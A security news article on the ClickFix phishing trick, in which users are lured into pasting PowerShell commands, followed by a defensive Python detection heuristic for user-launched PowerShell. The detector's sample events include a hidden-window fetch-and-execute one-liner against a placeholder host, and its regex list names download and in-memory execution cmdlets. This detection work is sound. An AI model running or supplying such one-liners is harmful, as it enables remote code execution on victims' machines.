Rising ClickFix malware distribution trick puts PowerShell IT policies on notice
Even cyber-espionage groups seem to have adopted the ClickFix technique. Toward the end of October, an APT group tracked as UAC-0050 that has a history of targeting organizations from Ukraine launched a phishing campaign in Ukrainian that used fake notifications about shared documents to direct users to an attacker-controlled website. The website used the combination of reCAPTCHA Phish and ClickFix to trick users into running PowerShell as part of a CAPTCHA challenge. The code deployed a rarely used information stealer dubbed Lucky Volunteer.
Mitigation
Installed on Windows by default, PowerShell is a very powerful scripting language and environment designed to simplify and automate system administration tasks. Because of its wide adoption in malware attacks over the past 10 years, security products monitor for potentially malicious PowerShell invocations.
However, they often look for instances where PowerShell scripts are being executed by other processes, because that’s how PowerShell is typically abused — as part of a larger attack chain, such as being launched by malicious Microsoft Word macros, or a malware dropper downloading and executing a malicious PowerShell script to deploy additional payloads.
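The gap described above, that is, PowerShell started by the user from the shell rather than by Word or a dropper, can be covered with a small detection heuristic over process-creation events. This is an added example, not code from the article or from any security product; it assumes the parent of a command pasted into the Run dialog is explorer.exe, and the events it scans are constructed samples.

```python
"""Flag ClickFix-style PowerShell launches in process-creation events.
Traditional rules fire when PowerShell's parent is Word, a script host or a
dropper; ClickFix has the victim paste the command into Win+R, so the parent
is the user's shell. Sample events below are constructed, not real logs."""
import re

# Parents the usual "PowerShell spawned by another process" rules already cover.
KNOWN_ABUSED_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                        "wscript.exe", "mshta.exe"}
# Assumption: a command entered in the Run dialog is spawned by explorer.exe.
USER_SHELL_PARENTS = {"explorer.exe"}

# Command-line traits commonly present in pasted one-liners (defensive heuristic).
SUSPICIOUS = [
    re.compile(r"\b(iex|invoke-expression)\b", re.I),      # in-memory execution
    re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I),      # base64-encoded command
    re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),          # window hidden from user
    re.compile(r"get-clipboard", re.I),                     # payload pulled from clipboard
]

def classify(event):
    """Return (verdict, matched_patterns) for one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return "ignore", []
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    hits = [p.pattern for p in SUSPICIOUS if p.search(event["cmdline"])]
    if parent in KNOWN_ABUSED_PARENTS:
        return "alert_process_chain", hits    # the classic rule already catches this
    if parent in USER_SHELL_PARENTS and hits:
        return "alert_user_launched", hits    # the ClickFix case the classic rule misses
    return "benign", hits

def scan(events):
    """Return (index, verdict) for every event that produces an alert."""
    out = []
    for i, e in enumerate(events):
        verdict, _ = classify(e)
        if verdict.startswith("alert"):
            out.append((i, verdict))
    return out

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [  # constructed sample events
    {"image": PS, "parent": "C:\\Windows\\explorer.exe",
     "cmdline": 'powershell.exe -w hidden -c "iex (iwr http://example.invalid/x)"'},
    {"image": PS, "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmdline": "powershell.exe -enc AAAAAAAAAAAA"},
    {"image": PS, "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
    {"image": "C:\\Windows\\System32\\notepad.exe", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, verdict in scan(EVENTS):
        print(idx, verdict, classify(EVENTS[idx])[1])
```

Only the first event is the ClickFix pattern; an admin running Get-Service from the same parent stays benign because the command-line traits, not the parent alone, decide.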